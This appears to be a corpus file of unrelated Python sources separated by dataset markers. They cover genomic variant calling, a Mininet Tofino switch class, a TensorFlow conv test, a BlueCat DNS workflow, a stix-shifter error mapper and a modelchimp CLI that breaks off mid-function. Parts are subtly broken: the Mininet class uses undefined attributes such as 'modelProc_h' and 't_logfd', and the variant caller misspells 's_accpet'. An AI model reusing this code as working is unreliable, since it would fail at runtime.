genome_pos = read.reference_start
read_pos = 0
for (cigarType,cigarLength) in read.cigartuples:
if cigarType == 0: #MATCH bases in read (M cigar code)
genome_end = genome_pos + cigarLength
read_end = read_pos + cigarLength
ref_seq = records[in_chr].seq[genome_pos:genome_end].upper()
read_seq = read.query_sequence[read_pos:read_end]
read_qual = read.query_qualities[read_pos:read_end]
frag_len = len(ref_seq)
t_g_pos = genome_pos - g_m_start - 1
for i in range(0, frag_len):
t_g_pos += 1
if t_g_pos < m_end and read_seq[i] in base and mismatch[t_g_pos] > 1:
t_index = q_max*base[read_seq[i]] + read_qual[i]
if t_index > -1 and t_index < q_m_height:
if read.is_reverse:
r_q_matrix[t_index][t_g_pos] += 1
else:
f_q_matrix[t_index][t_g_pos] += 1
if ref_seq[i] != read_seq[i]:
m_array[t_g_pos] += 1
active_pos[t_g_pos] = 1
coverage[t_g_pos] += 1
base_array[base[read_seq[i]]][t_g_pos] += 1
genome_pos = genome_end
read_pos = read_end
elif cigarType == 1: #INS in read (I cigar code)
read_end = read_pos + cigarLength
read_seq = read.query_sequence[read_pos-1:read_end]
ref_seq = records[in_chr].seq[genome_pos-1]
t_g_pos = genome_pos - g_m_start - 1
indel_key = ref_seq + "\t" + read_seq
indel_strand = 0
if t_g_pos < m_end:
if read.is_reverse:
indel_strand = 1
if t_g_pos not in indels:
indels[t_g_pos] = {}
if indel_key not in indels[t_g_pos]:
indels[t_g_pos][indel_key] = ([[s_num, min(read.query_qualities[read_pos:read_end]), indel_strand, t_g_pos + 1]])
else:
indels[t_g_pos][indel_key].append([s_num, min(read.query_qualities[read_pos:read_end]), indel_strand, t_g_pos + 1])
indarray[t_g_pos] += 1
active_pos[t_g_pos] = 1
read_pos = read_end
elif cigarType == 2: #DELETION in read (D cigar code)
genome_end = genome_pos + cigarLength
ref_seq = "".join(records[in_chr].seq[y] for y in range(genome_pos-1, genome_end))
read_seq = read.query_sequence[read_pos-1:read_pos]
t_g_pos = genome_pos - g_m_start
if t_g_pos < m_end:
indel_key = ref_seq + "\t" + read_seq
indel_strand = 0
if read.is_reverse:
indel_strand = 1
if t_g_pos not in indels:
indels[t_g_pos] = {}
if indel_key not in indels[t_g_pos]:
indels[t_g_pos][indel_key] = ([[s_num, min(read.query_qualities[read_pos:read_pos+1]), indel_strand, t_g_pos]])
#print (indels[t_g_pos])
else:
indels[t_g_pos][indel_key].append([s_num, min(read.query_qualities[read_pos:read_pos+1]), indel_strand, t_g_pos])
#print (indels[t_g_pos])
indarray[t_g_pos] += 1
active_pos[t_g_pos] = 1
genome_pos = genome_end
elif cigarType == 3: #SPLICED region in read representing numer of skipped bases on reference (N cigar code)
genome_pos += cigarLength #jump to next coordinate by skipping bases
elif cigarType == 4: #SOFTCLIP
read_pos += cigarLength
else:
pass
return coverage, base_array, r_q_matrix, f_q_matrix, m_array, active_pos, indels, indarray
def check_coverage_thresh(cov, pos, num_of_samples):
for i in range(0, num_of_samples):
if cov[i][pos] < min_cov:
return 0
return 1
def active_region(cov, mut, pos, num_of_samples, verbose):
for i in range(0, num_of_samples):
if cov[i][pos] > 0:
background_noise = cov[i][pos] * noise
background_test = poisson.cdf(background_noise, mut[i][pos])
if background_test < background_p_thresh:
return background_test
return 1
def calculate_region_pvalues(pos, num_of_samples, b_a, ref_segment, m_end, mut, cov, st):
background_probs = list()
region_start = pos - region_interval
region_end = pos + region_interval + 1
min_p = 1
if region_start < 0:
region_end += (-1) * region_start
region_start = 0
if region_end > m_end:
region_start -= region_end - m_end
region_end = m_end
for j in range(0, num_of_samples):
region_noise = 0
noise_sum = 0
num_of_bases = 0
region_mean_cov = 0
region_mean_mut = 0
for i in range(region_start, region_end):
if mut[j][i] > 0 and i != pos and mut[j][i] / cov[j][i] < 0.05:
region_noise += mut[j][i]
noise_sum += cov[j][i]
num_of_bases += 1
if region_noise > 0 and num_of_bases > 0:
region_mean_cov = noise_sum / num_of_bases
region_mean_mut = region_noise / num_of_bases
region_noise = (region_mean_mut/region_mean_cov) * cov[j][pos] + noise * cov[j][pos]
else:
region_noise = noise * cov[j][pos]
background_probs.append([poisson.cdf(region_noise, b_a[j][0][pos]), poisson.cdf(region_noise, b_a[j][1][pos]), poisson.cdf(region_noise, b_a[j][2][pos]), poisson.cdf(region_noise, b_a[j][3][pos])])
background_probs[-1][base[ref_segment[pos]]] = 1.0
for i in range(0, 4):
if background_probs[-1][i] < min_p:
min_p = background_probs[-1][i]
return background_probs, min_p
def calculate_strand_and_qual_probs(pos, num_of_samples, f_q_m, r_q_m, ref_segment, background_probs):
strand_probs = list()
qual_probs = list()
for j in range(0, num_of_samples):
forward_sum, reverse_sum, f_q_sum, r_q_sum = 1, 1, 1, 1
strand_probs.append([1, 1, 1, 1, 1])
qual_probs.append([1, 1, 1, 1, 1])
qual_sums = 0
for k in range(0, q_m_height):
forward_sum += f_q_m[j][k][pos]
reverse_sum += r_q_m[j][k][pos]
if f_q_m[j][k][pos] > 0:
qual_sums += f_q_m[j][k][pos] * (k - k/q_max * q_max)
if r_q_m[j][k][pos] > 0:
qual_sums += r_q_m[j][k][pos] * (k - k/q_max * q_max)
strand_probs[-1][0] = fisher_exact([[(forward_sum+reverse_sum)/2, (forward_sum+reverse_sum)/2], [forward_sum, reverse_sum]])[1]
qual_sums = qual_sums / (forward_sum + reverse_sum)
for k in range(0, 4):
if background_probs[j][k] < 0.05:
local_forward_sum = 0
local_reverse_sum = 0
for l in range(k*q_max, (k+1)*q_max):
local_forward_sum += f_q_m[j][l][pos]
local_reverse_sum += r_q_m[j][l][pos]
if f_q_m[j][l][pos] > 0:
qual_probs[-1][k] += f_q_m[j][l][pos] * (l - l/q_max * q_max)
if r_q_m[j][l][pos] > 0:
qual_probs[-1][k] += r_q_m[j][l][pos] * (l - l/q_max * q_max)
if local_forward_sum > 0 or local_reverse_sum > 0:
strand_probs[-1][k+1] = fisher_exact([[local_forward_sum, local_reverse_sum], [forward_sum, reverse_sum]])[1]
qual_probs[-1][k] = poisson.cdf(qual_probs[-1][k]/(local_forward_sum + local_reverse_sum), qual_sums)
else:
qual_probs[-1][k] = 1
return strand_probs, qual_probs
def get_region(bed_input):
in_chr = bed_input[0]
start = int(bed_input[1])
end = int(bed_input[2])
end = end + 1
local_muts = list()
if in_chr not in records:
return
g_m_start = -1
g_m_end = -1
m_start = 0
m_end = 0
g_m_start = start - 1000
g_m_end = end
ref_segment = records[in_chr].seq[g_m_start:g_m_end+100].upper()
m_end = end - g_m_start + 100
#initialize matrices
f_q_m = list()
r_q_m = list()
b_a = list()
cov = list()
mut = list()
reads = [[] for x in xrange(num_of_samples)]
mismatch = [0]*m_end
indarray = list()
active_pos = dict()
indels = dict()
for i in range(0, num_of_samples):
f_q_m.append(numpy.zeros((q_m_height, m_end), dtype=numpy.int))
r_q_m.append(numpy.zeros((q_m_height, m_end), dtype=numpy.int))
b_a.append(numpy.zeros((4, m_end+100), dtype=numpy.int))
cov.append(numpy.zeros((m_end), dtype=numpy.int))
indarray.append(numpy.zeros((m_end), dtype=numpy.int))
mut.append(numpy.zeros((m_end), dtype=numpy.int))
#matrix initialize over
for i in range(0, num_of_samples):
r_bam = pysam.AlignmentFile(bamlist[i], "rb")
reads[i], mismatch = import_reads(in_chr, start, end, r_bam, g_m_start, m_end, mismatch, reads[i])
r_bam.close()
for i in range(0, num_of_samples):
cov[i], b_a[i], r_q_m[i], f_q_m[i], mut[i], active_pos, indels, indarray[i] = import_data(reads[i], cov[i], b_a[i], r_q_m[i], f_q_m[i], mut[i], in_chr, g_m_start, m_end, active_pos, indels, i, indarray[i], mismatch)
if input_coords == 0:
active_coords = active_pos.keys()
active_coords.sort()
else:
active_coords = list()
active_coords = [start-g_m_start-1]
for i in active_coords:
ref_base = ref_segment[i]
if i in indels.keys():
for key in indels[i].keys():
ind_cov = [0] * num_of_samples
ind_freq = [0] * num_of_samples
ind_forw = [0] * num_of_samples
ind_rev = [0] * num_of_samples
ind_quals = [0] * num_of_samples
qual_sums = [0] * num_of_samples
forward_sums = [0] * num_of_samples
reverse_sums = [0] * num_of_samples
indel_probs = [1] * num_of_samples
indel_norm_qual = [0] * num_of_samples
norm_qual = [0] * num_of_samples
qual_bias = [1] * num_of_samples
strand_bias = [1] * num_of_samples
indel_result = list()
for els in indels[i][key]:
if els[0] <= num_of_samples:
ind_cov[els[0]] += 1
if els[2] == 0:
ind_forw[els[0]] += 1
else:
ind_rev[els[0]] += 1
ind_quals[els[0]] += els[1]
for j in range(0, num_of_samples):
if ind_cov[j] > 0 and cov[j][i] > 0:
ind_freq[j] = ind_cov[j] * 100 / cov[j][i]
for j in range(0, num_of_samples):
for k in range(0, q_m_height):
forward_sums[j] += f_q_m[j][k][i]
reverse_sums[j] += r_q_m[j][k][i]
if f_q_m[j][k][i] > 0:
qual_sums[j] += f_q_m[j][k][i] * (k - k/q_max * q_max)
if r_q_m[j][k][i] > 0:
qual_sums[j] += r_q_m[j][k][i] * (k - k/q_max * q_max)
for j in range(0, num_of_samples):
if cov[j][i] > 0:
norm_qual[j] = qual_sums[j] / cov[j][i]
if ind_cov[j] > 1:
indel_probs[j] = poisson.cdf(int(cov[j][i] * indel_noise_freq), ind_cov[j])
indel_norm_qual[j] = ind_quals[j] / ind_cov[j]
for j in range(0, num_of_samples):
if indel_norm_qual[j] > 0 and norm_qual[j] > 0:
qual_bias[j] = poisson.cdf(indel_norm_qual[j], norm_qual[j])
if ind_cov > 0:
strand_bias[j] = fisher_exact([[ind_forw[j], ind_rev[j]],[forward_sums[j], reverse_sums[j]]])[1]
for j in range(0, num_of_samples):
indel_result.append(str(cov[j][i]) + ";" + str(ind_cov[j]) + "," + str(ind_forw[j]) +";" + str(ind_rev[j]) + "," + str(forward_sums[j]) + ";" + str(reverse_sums[j]) + "," + str("%.2g" % indel_probs[j]) + "," + str("%.2g" % qual_bias[j]) + "," + str("%.2g" % strand_bias[j]))
germline = 0
somatic = 0
accept = 0
if indel_probs[0] < 0.05:
if ind_freq[0] > 5 and ind_cov[0] > 4:
accept = 1
mutationhandle.write("%s\t%d\t%s\tgermline\t%d\t%s\n" % (in_chr, els[3] + g_m_start, key, accept, "\t".join(indel_result)))
else:
if min(indel_probs[1:num_of_samples]) < 0.05:
s_accept = 1
if max(qual_bias[1:num_of_samples]) < 0.05:
s_accpet = 0
if cov[0][i] < filter_coverage:
if ind_cov[0] > 0:
s_accept = 0
else:
if ind_cov[0] > normal_mut_thresh:
s_accept = 0
if max(ind_freq[1:num_of_samples]) < freq_filter_high_cov:
s_accept = 0
if max(ind_cov[1:num_of_samples]) < minimum_indel_mut:
s_accept = 0
if s_accept == 1:
accept = 1
if cov[0][i] < min_norm_cov:
accept = 0
mutationhandle.write("%s\t%d\t%s\tsomatic\t%d\t%s\n" % (in_chr, els[3] + g_m_start, key, accept, "\t".join(indel_result)))
if ref_base in base:
background_probs, min_p = calculate_region_pvalues(i, num_of_samples, b_a, ref_segment, m_end, mut, cov, g_m_start)
background_p = active_region(cov, mut, i, num_of_samples, 0)
if background_p < 0.05 or min_p < 0.05:
strand_probs, qual_probs = calculate_strand_and_qual_probs(i, num_of_samples, f_q_m, r_q_m, ref_segment, background_probs)
multi_normal = 0
normal_mut = -1
multi_allelic = 0
somatic = -1
somatic = list()
germline = list()
sample_results = list()
for j in range(0, num_of_samples):
sample_results.append( str(cov[j][i])+";"+",".join(str(b_a[j][y][i]) for y in range(0, 4)) + ";" + ','.join(str("%.2g" % x) for x in background_probs[j]) + ";" + ':'.join(str("%.2g" % x) for x in strand_probs[j]) + ";" + ','.join(str("%.2g" % x) for x in qual_probs[j]))
sample_results = '\t'.join(str(x) for x in sample_results)
for j in range(0, 4):
if background_probs[0][j] < 0.05 and j != base[ref_base]:
germline.append(j)
for j in range(0, 4):
local_mut = 0
for k in range(1, num_of_samples):
if background_probs[k][j] < 0.05 and j != base[ref_base]:
local_mut = 1
if local_mut == 1 and j != base[ref_base]:
in_germline = 0
for l in range(0,len(germline)):
if germline[l] == j:
in_germline = 1
if in_germline == 0:
somatic.append(j)
if len(germline) > 0:
mut_type = "germline"
if len(germline) > 1:
mut_type = "germline_multi"
for j in range(0, len(germline)):
if b_a[0][germline[j]][i] > 4 and b_a[0][germline[j]][i] * 100 / cov[0][i] > 5:
mutationhandle.write("%s\t%d\t%c\t%c\t%s\t1\t%s\n" % (in_chr, i + g_m_start + 1, ref_base, rb[germline[j]], mut_type, sample_results))
else:
mutationhandle.write("%s\t%d\t%c\t%c\t%s\t0\t%s\n" % (in_chr, i + g_m_start + 1, ref_base, rb[germline[j]], mut_type, sample_results))
if len(somatic) > 0:
mut_type = "somatic"
if len(somatic) > 1:
mut_type = "somatic_multi"
for j in range(0, len(somatic)):
accept = 0
for k in range(1, num_of_samples):
s_accept = 1
if cov[k][i] > 0:
if qual_probs[k][somatic[j]] < 0.05:
s_accept = 0
if cov[k][i] < filter_coverage:
if b_a[0][somatic[j]][i] > 0:
s_accept = 0
else:
if b_a[0][somatic[j]][i] > normal_mut_thresh:
s_accept = 0
if b_a[k][somatic[j]][i]*100/cov[k][i] < freq_filter_high_cov:
s_accept = 0
if b_a[k][somatic[j]][i] < min_somatic_mut:
if b_a[k][somatic[j]][i]*100/cov[k][i] < freq_thresh:
s_accept = 0
if proximal_indel_filter == 1:
if max(indarray[k][i-prox_indel_dist:i+prox_indel_dist]) >= prox_indel_mut_count:
s_accept = 0
else:
s_accept = 0
if s_accept == 1:
accept = 1
if min_norm_cov > cov[0][i]:
accept = 0
mutationhandle.write("%s\t%d\t%c\t%c\tsomatic\t%d\t%s\n" % (in_chr, i + g_m_start + 1, ref_base, rb[somatic[j]], accept, sample_results))
tbed = "\t".join(bed_input)
print (tbed)
bedloghandle.write("%s\n" % (tbed))
bedfile = open(options.bed, "r")
genes = [line.rstrip().split('\t') for line in bedfile]
for k in genes:
get_region(k)
mutationhandle.close()
bedloghandle.close()
| StarcoderdataPython |
9673686 | banido = 'https://tenor.com/view/ednaldo-pereira-banido-desbanido-meme-meme-banido-gif-19429642'
desbanido = 'https://tenor.com/view/desbanido-ednaldo-pereira-ednaldo-pereira-banido-gif-19443137'
repositorio = 'https://github.com/Eduardo-Barreto/Marselo-Bot'
readme = 'https://github.com/Eduardo-Barreto/Marselo-Bot/blob/master/README.md'
rickrolling = 'https://youtu.be/dQw4w9WgXcQ'
playlist = 'https://open.spotify.com/playlist/0TWxX4f5AiAfE4FVFj8Vcq?si=d79e763e368743f2'
conexao_digital = 'https://conexaodigital2em.sesisp.org.br/calendar/view.php?view=month'
| StarcoderdataPython |
9622401 | <reponame>carpedkm/vedatad
from vedacore.misc import registry
from .base_hook import BaseHook
@registry.register_module('hook')
class WorkerInitHook(BaseHook):
"""Worker init for training."""
def before_train_epoch(self, looper):
worker_init_fn = looper.train_dataloader.worker_init_fn
if worker_init_fn is not None and hasattr(worker_init_fn, 'set_epoch'):
worker_init_fn.set_epoch(looper.epoch)
@property
def modes(self):
return ['train']
| StarcoderdataPython |
6524710 | # coding=utf-8
# Copyright 2018-present Open Networking Foundation
# SPDX-License-Identifier: Apache-2.0
'''
This module contains a switch class for Mininet: StratumTofinoModel
Usage
-----
From withing the Docker container, you can run Mininet using the following:
$ mn --custom tools/mininet/tofino-model.py --switch stratum-t-model --link tofino
'''
import json
import multiprocessing
import os
import socket
import threading
import time
from mininet.log import warn
from mininet.node import Switch, Host
from mininet.link import Link
TOFINO_MODEL_BIN = 'tofino-model'
STRATUM_BIN = 'stratum_bf'
# DEV_STRATUM_BIN = '/root/stratum/bazel-bin/stratum/hal/bin/barefoot/stratum_bf'
def watchdog(sw):
try:
with open(sw.keepalive, "w") as f:
f.write(f"Remove this file to terminate {sw.name}")
while True:
if StratumTofinoModel.mininet_exception == 1 \
or not os.path.isfile(sw.keepalive):
sw.stop()
return
if sw.stopped:
return
# protect against already crashed process, will be none and fail to poll()
if sw.modelProc_h is not None and sw.stratumProc_h is not None:
# poll open proc handles
if sw.modelProc_h.poll() is None and sw.stratumProc_h.poll() is None:
time.sleep(1)
else:
warn("\n*** WARN: switch %s died ☠️ \n" % sw.name)
sw.stop()
return
except Exception as e:
warn("*** ERROR: " + e.message)
sw.stop()
class StratumTofinoModel(Switch):
mininet_exception = multiprocessing.Value('i', 0)
nextNodeId = 0
def __init__(self, name, inNamespace = True,
sdeInstall="/root/sde/install",
bfSwitchdConfig="/etc/stratum/tofino_skip_p4.conf", **kwargs):
Switch.__init__(self, name, inNamespace = True, **kwargs)
self.sdeInstall = sdeInstall
self.bfSwitchdConfig = bfSwitchdConfig
self.nodeId = StratumTofinoModel.nextNodeId * 64
StratumTofinoModel.nextNodeId += 1
self.tmpDir = '/tmp/%s' % self.name
self.chassisConfigFile = '%s/chassis-config.txt' % self.tmpDir
self.portVethFile = '%s/ports.json' % self.tmpDir
# process handles for tofino model and stratum
self.modelProcHandle = None
self.stratumProcHandle = None
# !(run) or run ? boolean bit
self.stopped = True
# In case of exceptions, mininet removes *.out files from /tmp. We use
# this as a signal to terminate the switch instance (if active).
self.keepalive = '/tmp/%s-watchdog.out' % self.name
# Remove files from previous executions
self.cmd("rm -rf %s" % self.tmpDir)
os.mkdir(self.tmpDir)
def stop(self, deleteIntfs=True):
"""Terminate switch."""
self.stopped = True
if self.anyProcHandleLive():
self.tryTerminate()
self.modelProcHandle = None
self.stratumProcHandle = None
Switch.stop(self, deleteIntfs)
def start(self, controllers):
if not self.stopped: return
#TODO this could prob be replaced by setting an ip in the parent.init
# or something to trigger ip link up...
self.cmd("/usr/sbin/ip l set dev lo up")
with open(self.chassisConfigFile, 'w') as fp:
fp.write(self.getChassisConfig())
with open(self.portVethFile, 'w') as fp:
fp.write(self.getPortVethMap())
tof_cmd_string = " ".join(
[
TOFINO_MODEL_BIN,
f'--p4-target-config={self.bfSwitchdConfig}',
f'-f{self.portVethFile}'
]
)
stratum_cmd_string = " ".join(
[
STRATUM_BIN,
f'-chassis_config_file={self.chassisConfigFile}',
'-enable_onlp=false',
'-bf_switchd_background=false',
'-v=2',
f'-bf_sde_install={self.sdeInstall}',
f'-bf_switchd_cfg={self.bfSwitchdConfig}',
]
)
try:
# Write cmd_string to log for debugging.
self.modelLogHandle = open(f'{self.tmpDir}/tofino_model_process.log' , "w")
self.modelLogHandle.write(tof_cmd_string + "\n\n" + "-" * 80 + "\n\n")
self.modelLogHandle.flush()
self.stratumLogHandle = open(f'{self.tmpDir}/stratum_process.log', "w")
self.stratumLogHandle.write(stratum_cmd_string + "\n\n" + "-" * 80 + "\n\n")
self.stratumLogHandle.flush()
self.modelProcHandle = self.popen(tof_cmd_string, stdout=self.t_logfd, stderr=self.t_logfd)
self.stratumProcHandle = self.popen(stratum_cmd_string, stdout=self.s_logfd, stderr=self.s_logfd)
# We want to be notified if processes quits prematurely...
self.stopped = False
threading.Thread(target=watchdog, args=[self]).start()
except Exception:
StratumTofinoModel.mininet_exception = 1
self.stop()
raise
def getPortVethMap(self):
intf_number = 1
portsVeth = list()
for intf_name in self.intfNames():
if intf_name == 'lo': continue
portsVeth.append(
{
"device_port": intf_number,
"veth1": int(intf_name[4:]),
"veth2": int(intf_name[4:])+100
}
)
intf_number+=1
data = { "PortToVeth": portsVeth }
return json.dumps(data, indent=4) + "\n"
def getChassisConfig(self):
config = """description: "chassis config bf tofino model {name}"
chassis {{
platform: PLT_GENERIC_BAREFOOT_TOFINO
name: "{name}"
}}
nodes {{
id: {nodeId}
name: "{name}"
slot: 1
index: 1
}}\n""".format(name=self.name, nodeId=self.nodeId)
intf_number = 1
for intf_name in self.intfNames():
if intf_name == 'lo':
continue
config = config + """singleton_ports {{
id: {intfNumber}
name: "{intfName}"
slot: 1
port: {intfNumber}
channel: 1
speed_bps: 10000000000
config_params {{
admin_state: ADMIN_STATE_ENABLED
}}
node: {nodeId}
}}\n""".format(intfName=intf_name, intfNumber=intf_number, nodeId=self.nodeId)
intf_number += 1
return config
def anyProcHandleLive(self):
return self.modelProcHandle is not None or self.stratumProcHandle is not None
def tryTerminate(self):
if self.modelProcHandle is not None:
if self.modelProcHandle.poll() is None:
self.modelProcHandle.terminate()
self.modelProcHandle.wait()
if self.stratumProc_h is not None:
if self.stratumProcHandle.poll() is None:
self.stratumProcHandle.terminate()
self.stratumProcHandle.wait()
if self.modelLogHandle is not None:
self.modelLogHandle.close()
self.modelLogHandle = None
if self.stratumLogHandle is not None:
self.stratumLogHandle.close()
self.stratumLogHandle = None
class NoOffloadHost(Host):
def __init__(self, name, inNamespace=True, **params):
Host.__init__(self, name, inNamespace=inNamespace, **params)
def config(self, **params):
r = super(Host, self).config(**params)
for off in ["rx", "tx", "sg"]:
cmd = "/sbin/ethtool --offload %s %s off" \
% (self.defaultIntf(), off)
self.cmd(cmd)
return r
class TofinoLink(Link):
"Link with tofino port numbering i.e. only allows veth%d"
def __init__(self, *args, **kwargs):
Link.__init__(self, *args, **kwargs)
def intfName(self, node, n):
"Construct a tofmodel veth interface vethN for interface n."
# skip over Hosts as the nodeId not present
if isinstance(node, Host):
return node.name + '-eth' + repr( n )
return f"veth{node.nodeId-1+n}"
# Exports for bin/mn
switches = {'stratum-t-model': StratumTofinoModel}
hosts = {'no-offload-host': NoOffloadHost}
LINKS = { 'default': Link, # Note: overridden below
# 'tc': TCLink,
# 'tcu': TCULink,
# 'ovs': OVSLink,
'tofino': TofinoLink}
| StarcoderdataPython |
5109565 | #-----------------------------------------------------------------------------
# Copyright (c) 2018 <NAME>, <NAME>, <NAME>
# danielhn<at>ece.ubc.ca
#
# Permission to use, copy, and modify this software and its documentation is
# hereby granted only under the following terms and conditions. Both the
# above copyright notice and this permission notice must appear in all copies
# of the software, derivative works or modified versions, and any portions
# thereof, and both notices must appear in supporting documentation.
# This software may be distributed (but not offered for sale or transferred
# for compensation) to third parties, provided such third parties agree to
# abide by the terms and conditions of this notice.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHORS, AS WELL AS THE UNIVERSITY
# OF BRITISH COLUMBIA DISCLAIM ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO
# EVENT SHALL THE AUTHORS OR THE UNIVERSITY OF BRITISH COLUMBIA BE LIABLE
# FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR
# IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#---------------------------------------------------------------------------
import tensorflow as tf
import numpy as np
import string
size = 5
outputs = 2
X = tf.placeholder(tf.float32, [1, size,size,1])
weights = tf.placeholder(tf.float32, [3,3,1,outputs])
w1 = tf.placeholder(tf.float32, [3,3,2,outputs])
x=[1,0,1,1,-1,1,1,0,-1,0,1,0,0,-1,0,1,0,1,1,-1,-1,0,-1,1,1]
w11=[1,-1,1,0,0,0,1,0,0,1,0,-1,0,1,1,0,0,-1]
w2=[1,-1,1,0,0,0,1,-1,1,0,0,0,1,-1,1,0,0,0,0,1,1,0,0,-1,0,1,1,0,0,-1,1,0,0,1,-1,0]
in_x=np.reshape(np.array(x).transpose(),[1,size,size,1])
in_weights = np.reshape(np.array(w11).transpose(),[3,3,1,outputs])
in_w1 = np.reshape(np.array(w2).transpose(),[3,3,2,outputs])
print in_x.reshape(1,5,5,1)
print "======="
print in_weights.reshape(3,3,1,2)
print "======="
print in_w1.reshape(3,3,2,2)
print "======="
y1 = tf.nn.conv2d(X, weights, strides=[1, 1, 1, 1], padding='SAME')
y = tf.nn.conv2d(y1, w1, strides=[1, 1, 1, 1], padding='SAME')
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
r1 = sess.run(y1, feed_dict={X: in_x, weights: in_weights})
result = sess.run(y, feed_dict={X: in_x, weights: in_weights, w1: in_w1})
print r1.reshape(1,size,size,2)
print "======="
print result.reshape(1,size,size,2)
| StarcoderdataPython |
6553905 | <filename>Examples/Alias Record/delete_alias_record_example/delete_alias_record_example_page.py
# Copyright 2017 BlueCat Networks. All rights reserved.
# Various Flask framework items.
import os
import sys
from flask import url_for, redirect, render_template, flash, g, request
from bluecat import route, util
import config.default_config as config
from main_app import app
from .delete_alias_record_example_form import GenericFormTemplate
def module_path():
encoding = sys.getfilesystemencoding()
return os.path.dirname(os.path.abspath(unicode(__file__, encoding)))
# The workflow name must be the first part of any endpoints defined in this file.
# If you break this rule, you will trip up on other people's endpoint names and
# chaos will ensue.
@route(app, '/delete_alias_record_example/delete_alias_record_example_endpoint')
@util.workflow_permission_required('delete_alias_record_example_page')
@util.exception_catcher
def delete_alias_record_example_delete_alias_record_example_page():
form = GenericFormTemplate()
# Remove this line if your workflow does not need to select a configuration
form.configuration.choices = util.get_configurations(default_val=True)
return render_template('delete_alias_record_example_page.html', form=form, text=util.get_text(module_path(), config.language),
options=g.user.get_options())
@route(app, '/delete_alias_record_example/form', methods=['POST'])
@util.workflow_permission_required('delete_alias_record_example_page')
@util.exception_catcher
def delete_alias_record_example_delete_alias_record_example_page_form():
form = GenericFormTemplate()
# Remove this line if your workflow does not need to select a configuration
form.configuration.choices = util.get_configurations(default_val=True)
if form.validate_on_submit():
try:
# Retrieve form attributes and declare variables
configuration = g.user.get_api().get_entity_by_id(form.configuration.data)
view = configuration.get_view(request.form['view'])
# Retrieve alias record
alias_record = view.get_alias_record(request.form['alias_record'] + '.' + request.form['zone'])
# Retrieve alias_record attributes for flash message
alias_name = alias_record.get_name()
alias_id = util.safe_str(alias_record.get_id())
# Delete alias record
alias_record.delete()
# Put form processing code here
g.user.logger.info('Success - Alias Record ' + alias_name + ' Deleted with Object ID: ' + alias_id)
flash('Success - Alias Record ' + alias_name + ' Deleted with Object ID: ' + alias_id, 'succeed')
return redirect(url_for('delete_alias_record_exampledelete_alias_record_example_delete_alias_record_example_page'))
except Exception as e:
flash(util.safe_str(e))
g.user.logger.warning('%s' % util.safe_str(e), msg_type=g.user.logger.EXCEPTION)
return render_template('delete_alias_record_example_page.html',
form=form,
text=util.get_text(module_path(), config.language),
options=g.user.get_options())
else:
g.user.logger.info('Form data was not valid.')
return render_template('delete_alias_record_example_page.html',
form=form,
text=util.get_text(module_path(), config.language),
options=g.user.get_options())
| StarcoderdataPython |
12802834 | from stix_shifter_utils.utils.error_mapper_base import ErrorMapperBase
from stix_shifter_utils.utils.error_response import ErrorCode
from stix_shifter_utils.utils import logger
error_mapping = {
# These are only examples. Change the keys to reflect the error codes that come back from the data source API.
# search does not exist
1002: ErrorCode.TRANSMISSION_SEARCH_DOES_NOT_EXISTS,
# The search cannot be created. The requested search ID that was provided in the query expression is already in use.
# Please use a unique search ID (or allow one to be generated).
1004: ErrorCode.TRANSMISSION_MODULE_DEFAULT_ERROR.value,
# A request parameter is not valid
1005: ErrorCode.TRANSMISSION_INVALID_PARAMETER,
# The server might be temporarily unavailable or offline. Please try again later.
1010: ErrorCode.TRANSMISSION_REMOTE_SYSTEM_IS_UNAVAILABLE,
# An error occurred during the attempt
1020: ErrorCode.TRANSMISSION_MODULE_DEFAULT_ERROR.value,
#error in query
2000: ErrorCode.TRANSMISSION_QUERY_PARSING_ERROR,
400: ErrorCode.TRANSMISSION_QUERY_PARSING_ERROR,
403: ErrorCode. TRANSMISSION_FORBIDDEN,
401: ErrorCode.TRANSMISSION_AUTH_CREDENTIALS
}
class ErrorMapper():
logger = logger.set_logger(__name__)
DEFAULT_ERROR = ErrorCode.TRANSMISSION_MODULE_DEFAULT_ERROR
@staticmethod
def set_error_code(json_data, return_obj):
code = None
try:
code = int(json_data['code'])
except Exception:
pass
error_code = ErrorMapper.DEFAULT_ERROR
if code in error_mapping:
error_code = error_mapping[code]
if error_code == ErrorMapper.DEFAULT_ERROR:
ErrorMapper.logger.error("failed to map: " + str(json_data))
ErrorMapperBase.set_error_code(return_obj, error_code)
| StarcoderdataPython |
4992669 | import click
import os
import ntpath
#Temp, delete this
import sys
import tempfile
from shutil import make_archive, rmtree, unpack_archive, copy
sys.path.insert(0, '.')
from modelchimp.connection_thread import RestConnection
from modelchimp.utils import generate_uid
from modelchimp.log import get_logger
logger = get_logger(__name__)
@click.group()
def cli():
pass
@cli.command()
@click.option('--host', '-h', default='localhost:8000')
@click.option('--project-key', '-k')
@click.argument('path')
def sync(host, project_key, path):
if not project_key:
raise click.BadParameter("--project-key is required", param=project_key)
# Current working directory
cwd = os.getcwd()
full_path = os.path.join(cwd, path)
data, file_locations = create_temp_file(full_path)
# Connection addresses
rest_address = "%s/" %(host,)
version_id = generate_uid()
rest = RestConnection(rest_address, project_key, version_id)
rest.create_data_version(version_id, data, file_locations)
@cli.command()
@click.option('--host', '-h', default='localhost:8000')
@click.option('--project-key', '-k')
@click.argument('id')
def pull_data(host, project_key, id):
if not project_key:
raise click.BadParameter("--project-key is required", param=project_key)
# Connection addresses
rest_address = "%s/" %(host,)
rest = RestConnection(rest_address, project_key, id)
url = 'api/retrieve-data-version/%s/?data-version=%s' % (rest.project_id, id)
logger.info("Downloading data with the id: %s" % id)
request = rest.get(url)
if request.status_code == 400:
logger.info("Unable to download data. Is it a valid id?")
data_object = request.content
with open('data.zip', 'wb') as f:
f.write(data_object)
unpack_archive('data.zip', 'data')
os.remove('data.zip')
def create_temp_file(path):
file = None
file_locations = []
if os.path.isfile(path):
file = _compress_file(path)
file_locations.append(path)
elif os.path.isdir(path):
for path, subdirs, files in os.walk(path):
for name in files:
file_locations.append(os.path.join(path, name))
file = _compress_folder(path)
else:
print("Oops, path is neither a file nor a folder")
return
return file, file_locations
def _compress_file(path):
